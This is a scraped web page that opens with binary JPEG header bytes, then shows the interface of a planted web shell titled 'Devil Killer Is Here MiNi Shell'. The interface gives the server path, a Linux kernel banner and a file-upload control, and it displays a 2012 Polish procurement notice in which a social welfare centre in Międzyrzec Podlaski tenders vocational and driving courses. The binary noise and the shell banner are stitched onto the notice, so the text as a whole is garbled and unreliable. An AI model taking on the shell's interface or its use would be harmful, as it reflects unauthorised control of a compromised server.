JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120629/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120629/141717-N-2012.html

<p class="kh_header"><b>Międzyrzec Podlaski: Organizacja kursów zawodowych</b><br>
<b>Numer ogłoszenia: 141717 - 2012; data zamieszczenia: 29.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Piłsudskiego 6, 21-560 Międzyrzec Podlaski, woj. lubelskie, tel. 083 3717803, faks 083 3717803.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> https://mopsmiedzyrzecpodl.netbip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: pomoc społeczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja kursów zawodowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia podzielony jest na 2 zadania:
zadanie 1 -profesjonalny sprzedawca z obsługa kasy fiskalnej dla 20 osób oraz fryzjer dla 2 osób
zadanie 2 - kurs prawa jazdy kategorii Bdla 15 osób  oraz kurs prawa jazdy C; C+E  dla 13 osób..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.40.00.00-8, 80.41.10.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 25.07.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże wykonanie, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, 2 (dwóch ) usług szkoleniowych polegających na przeprowadzeniu kursów zawodowych  odpowiadających przedmiotowi zamówienia. Dal spełnienia tego warunku Wykonawca przedstawi  wykaz usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy- w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców wg Załącznika nr  5 do SIWZ, oraz załączenia dokumentu potwierdzającego że te usługi zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże , iż posiada wykwalifikowaną kadrę, która przeprowadziła co najmniej 4 szkolenia o tematyce odpowiadającej przedmiotowi zamówień. Dla spełnienia tego warunku Wykonawca przedstawi listę osób ( imię i nazwisko), które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia  niezbędnego do wykonania zamówienia wskazanych w pkt. X.1c siwz , a także zakres wykonywanych przez nich czynności oraz informacji o  podstawie dysponowania tymi osobami sporządzony według wzoru stanowiącego załącznik  nr 1.2 oraz załącznik nr 6</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - doświdczenie w organizacji szkolenia - 20</li>
<li>3 - kwalifikacje kadry dydaktycznej - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	zmiana terminu zamówienia. Zamiana taka nie może wykraczać poza ustalone ramy czasowe zamówienia;
2.	zmiana miejsca przeprowadzenia usługi, z zastrzeżeniem, że proponowane miejsce spełnia warunki określone w postępowaniu przetargowym;
3.	zmiana warunków płatności na rzecz Wykonawcy na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych Instytucji Wdrażającej dotyczących realizacji projektu;
4.	zmiana osób upoważnionych do współpracy w sprawach związanych z wykonaniem umowy, o których mowa w § 10 umowy;
5. zmiana osób przy pomocy których Wykonawca realizować będzie zamówienie, z zastrzeżeniem, że proponowane przez Wykonawcę osoby będą spełniały warunki określone w SIWZ;  zmiana taka nie wymaga aneksu do umowy;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> https://mopsmiedzyrzecpodl.netbip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej
 21-560 Międzyrzec Podlaski ul. Piłsudskiego 6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.07.2012 godzina 10:30, miejsce: Miejski Ośrodek Pomocy Społecznej
 21-560 Międzyrzec Podlaski ul. Piłsudskiego 6
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiotem zamówienia jest usługa zorganizowania kursu zawodowego dla osób nieaktywnych zawodowo korzystających z pomocy społecznej w ramach projektu Szansa realizowanego przez Miejski Ośrodek Pomocy Społecznej w Międzyrzecu Podlaskim współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kursy zawodowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Organizacja szkolenia Profesjonalny sprzedawca z obsługą kasy fiskalnej  dla 20 osób nieaktywnych zawodowo korzystających ze świadczeń pomocy społecznej 
1.	Termin szkolenia	- Szkolenie powinno odbyć się w terminie od 25 lipca do 31 października 2012r.; w dni robocze od poniedziałku do piątku w godzinach 9 -17
2.	Minimum szkoleniowe -	Szkolenie ma się składać minimum z 160 godzin szkoleniowych (po 45 minut) zajęć teoretycznych i praktycznych.
3.	Zakres szkolenia-	Program kursu powinien zawierać minimum:
1. Przepisy BHP i p.poż. W obiekcie handlowym
2. Organizacja handlu w gospodarce rynkowej
3. Organizacja sprzedaży detalicznej
4. Organizacja zaopatrzenia i przyjmowania dostaw towarów.
5. Wykonywanie i dokumentowanie podstawowych obliczeń sklepowych
6. Obsługa klienta, przebieg sprzedaży detalicznej.
7. Negocjacje w handlu.
8. Podstawy obsługi komputera.
9. Obsługa programu Subiekt.
10. Obsługa kas fiskalnych.
4.	Cel szkolenia- Celem szkolenia jest teoretyczne i praktyczne przygotowanie osób szkolonych zgodnie z tematyką kursu oraz nabycie przez nich umiejętności zawodowych.
5.	Materiały szkoleniowe-	Autorskie materiały szkoleniowe przygotowane, powielone i przekazane uczestnikom szkoleń w formie podręcznika wielkości minimum A5 (przeniesienie autorskich praw majątkowych zgodnie z warunkami umowy). Ponadto każdy uczestnik szkolenia otrzyma notatnik i długopis. Wszystkie materiały szkoleniowe stają się własnością uczestnika szkolenia.
6.	Zaświadczenie-	Uczestnicy szkolenia otrzymają dokument potwierdzający ukończenie przedmiotowego kursu. Zaświadczenie- certyfikat ma zawierać informację o jego temacie oraz liczbie godzin.Zaświadczenie-certyfikat musi być oznakowany zgodnie z wytycznymi dotyczącymi projektów w ramach POKL oraz zawierać informację, że kurs został przeprowadzony na zlecenie Miejskiego Ośrodka Pomocy Społecznej w Międzyrzecu Podlaskim w ramach projektu Szansa  w ramach  POKL Priorytetu VII. Promocja integracji społecznej; 7.1. Rozwój i upowszechnienie aktywnej integracji; 7.1.1 Rozwój i upowszechnienie aktywnej integracji przez ośrodki pomocy społecznej współfinansowanego ze środków Europejskiego Funduszu Społecznego
7.	Miejsce szkolenia-Szkolenie ma być zorganizowane i przeprowadzone na terenie miasta Międzyrzec Podlaski
8.	Warunki lokalowe	-Sale szkoleniowe o pojemności min. 20 osób, sala z pełnym wyposażeniem ( krzesła dla uczestników, stolik i krzesło dla prelegenta, ekran, projektor multimedialny, flipchrt + blok papierowy, flamastry). Sala szkoleniowa musi posiadać dobre naświetlenie światłem dziennym i sztucznym, dobre zaciemnienie, oraz spełniać wymogi bezpieczeństwa i higieny pracy w dostosowaniu do liczby uczestników. Uczestnicy w trakcie szkolenia mają mieć zapewniony dostęp do węzła sanitarnego.
OZNAKOWANIE: sale szkoleniowe powinny być oznaczone zgodnie z aktualnymi wytycznymi MRR w zakresie informacji i promocji POKL.
9.	Wyżywienie	2 przerwy kawowe każdego dnia szkolenia składające się z kawy, herbaty, wody mineralnej, ciastek.
1 ciepły posiłek każdego dnia szkolenia składający się z II dania (np. ziemniaki, surówka, mięso). Dania powinny być każdego dnia inne, podawane w jednorazowych naczyniach z jednorazowymi sztućcami.
10.	Ubezpieczenie-	Wszyscy uczestnicy szkolenia zostaną objęci polisa NNW.
11.	Ewaluacja	-Wykonawca wykona i przeprowadzi ewaluację szkolenia za pomocą ankiet ewaluacyjnych.
2.	Organizacja szkolenia  fryzjer  dla 2 osób nieaktywnych zawodowo korzystających ze świadczeń pomocy społecznej.
1.	Termin szkolenia	Szkolenie powinno odbyć się w terminie od 25 lipca do 31 października 2012r.; w dni robocze od poniedziałku do piątku w godzinach 9 -17
2.	Minimum szkoleniowe	Szkolenie ma się składać minimum z 260 godzin szkoleniowych (po 45 minut) zajęć teoretycznych i praktycznych.
3.	Zakres szkolenia	Program kursu powinien zawierać minimum:
1. Przepisy BHP i p. poż. w salonie fryzjerskim.
2. Procedura zakładania własnej firmy.
3. Biznesplan i pozyskiwanie środków na rozpoczęcie działalności gospodarczej.
4. Organizacja stanowiska pracy.
5. Obsługa klienta.
6. Pielęgnacja włosów.
7. Wykonywanie strzyżenia damskiego i męskiego.
8. Układanie i stylizacja fryzur.
9. Wykonywanie zabiegów trwałej ondulacji i farbowania.
4.	Cel szkolenia	Celem szkolenia jest teoretyczne i praktyczne przygotowanie osób szkolonych zgodnie z tematyką kursu oraz nabycie przez nich umiejętności zawodowych.
5.	Materiały szkoleniowe	Autorskie materiały szkoleniowe przygotowane, powielone i przekazane uczestnikom szkoleń w formie podręcznika wielkości minimum A5 (przeniesienie autorskich praw majątkowych zgodnie z warunkami umowy). Ponadto każdy uczestnik szkolenia otrzyma notatnik i długopis. Wszystkie materiały szkoleniowe stają się własnością uczestnika szkolenia.
6.	Zaświadczenie	Uczestnicy szkolenia otrzymają dokument potwierdzający ukończenie przedmiotowego kursu. Zaświadczenie-certyfikat ma zawierać informację o jego temacie oraz liczbie godzin.
Zaświadczenie-certyfikat musi być oznakowany zgodnie z wytycznymi dotyczącymi projektów w ramach POKL oraz zawierać informację, że kurs został przeprowadzony na zlecenie Miejskiego Ośrodka Pomocy Społecznej w Międzyrzecu Podlaskim w ramach projektu w ramach  POKL Priorytetu VII. Promocja integracji społecznej; 7.1. Rozwój i upowszechnienie aktywnej integracji; 7.1.1 Rozwój i upowszechnienie aktywnej integracji przez ośrodki pomocy społecznej współfinansowanego ze środków Europejskiego Funduszu Społecznego
7.	Miejsce szkolenia	Szkolenie ma być zorganizowane i przeprowadzone w miejscu wskazanym przez Wykonawcę.
8.	Warunki lokalowe	Sala szkoleniowa musi posiadać dobre naświetlenie światłem dziennym i sztucznym oraz spełniać wymogi bezpieczeństwa i higieny pracy w dostosowaniu do liczby uczestników. Uczestnicy w trakcie szkolenia mają mieć zapewniony dostęp do węzła sanitarnego.
OZNAKOWANIE: sale szkoleniowe powinny być oznaczone zgodnie z aktualnymi wytycznymi MRR w zakresie informacji i promocji POKL.
9.	Wyżywienie	2 przerwy kawowe każdego dnia szkolenia składające się z kawy, herbaty, wody mineralnej, ciastek.
1 ciepły posiłek każdego dnia szkolenia składający się z II dania (np. ziemniaki, surówka, mięso).Dania powinny być każdego dnia inne, podawane w jednorazowych naczyniach z jednorazowymi sztućcami.
10.	Ubezpieczenie	Wszyscy uczestnicy szkolenia zostaną objęci polisa NNW.
11.	Ewaluacja	Wykonawca wykona i przeprowadzi ewaluację szkolenia za pomocą ankiet ewaluacyjnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.40.00.00-8, 80.41.10.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 25.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. doświdczenie w organizacji szkolenia - 20</li>
<li>3. kwalifikacje kadry dydaktycznej - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kursy zawodowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja kursu prawo jazdy kategorii B dla 15 osób nieaktywnych zawodowo korzystających ze świadczeń pomocy społecznej 
1.	Termin szkolenia	Szkolenie powinno odbyć się w terminie od 25 lipca do 30 listopada 2012r.; w dni robocze od poniedziałku do piątku.
2.	Minimum szkoleniowe	Szkolenie ma się składać minimum z 60 godzin szkoleniowych - 30 godzin zajęć teoretycznych i 30 godzin zajęć praktycznych zgodnie z obowiązującymi przepisami, którego zaliczenie uprawnia do złożenia egzaminu państwowego na prawo jazdy kat. B
3.	Zakres szkolenia	Program kursu musi być zgodny z przepisami Rozporządzenia Ministra Infrastruktury z dnia 27 października 2005 r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz. U. Nr 217 poz. 1834 z 2005 r. z późn. zm.)
4.	Cel szkolenia	Celem szkolenia jest teoretyczne i praktyczne przygotowanie osób szkolonych zgodnie z tematyką kursu oraz nabycie przez nich umiejętności.
5.	Materiały szkoleniowe	Autorskie materiały szkoleniowe przygotowane, powielone i przekazane uczestnikom szkoleń w formie podręcznika wielkości minimum A5 (przeniesienie autorskich praw majątkowych zgodnie z warunkami umowy). Ponadto każdy uczestnik szkolenia otrzyma notatnik i długopis. Wszystkie materiały szkoleniowe stają się własnością uczestnika szkolenia.
6.	Zaświadczenie 	-Wykonawca zapłaci za wykonanie badań lekarskich niezbędnych do wydania orzeczenia lekarskich stwierdzających brak przeciwwskazań zdrowotnych do kierowania pojazdami kat. B
- Wykonawca opłaci pierwszy egzamin państwowy w WORD. 
7.	Miejsce szkolenia	Szkolenie ma być zorganizowane i przeprowadzone na terenie miasta Międzyrzec Podlaski
8.	Warunki lokalowe i sprzętowe	Sale szkoleniowe oraz sprzęt użyty do przeprowadzenia kursu muszą być zgodne z Rozporządzeniem Ministra Infrastruktury z dnia 27 października 2005 r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz. U. Nr 217 poz. 1834 z 2005 r. z późn. zm.)
OZNAKOWANIE: sale szkoleniowe powinny być oznaczone zgodnie z aktualnymi wytycznymi MRR w zakresie informacji i promocji POKL.
9.	Ubezpieczenie	Wszyscy uczestnicy szkolenia zostaną objęci polisa NNW.
10.	Ewaluacja	Wykonawca wykona i przeprowadzi ewaluację szkolenia za pomocą ankiet ewaluacyjnych.

Organizacja kursu prawo jazdy kategorii C; C+E  dla 13 osób nieaktywnych zawodowo korzystających ze świadczeń pomocy społecznej 
1.	Termin szkolenia	Szkolenie powinno odbyć się w terminie od 25 lipca do 30 listopada 2012r.; w dni robocze od poniedziałku do piątku.
2.	Minimum szkoleniowe	Szkolenie ma się składać minimum z 60 godzin szkoleniowych - 30 godzin zajęć teoretycznych i 30 godzin zajęć praktycznych kursu na prawo jazdy kat. C zgodnie z obowiązującymi przepisami, którego zaliczenie uprawnia do złożenia egzaminu państwowego na prawo jazdy kat. C oraz minimum 45 godzin szkoleniowych - 20 godzin teoretycznych i minimum 25 godzin praktycznych kursu na prawo jazdy kat. C+E, zgodnie z obowiązującymi przepisami, którego zaliczenie uprawnia do złożenia egzaminu państwowego na prawo jazdy kat. C+E
3.	Zakres szkolenia	Program kursu musi być zgodny z przepisami Rozporządzenia Ministra Infrastruktury z dnia 27 października 2005 r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz. U. Nr 217 poz. 1834 z 2005 r. z późn. zm.)
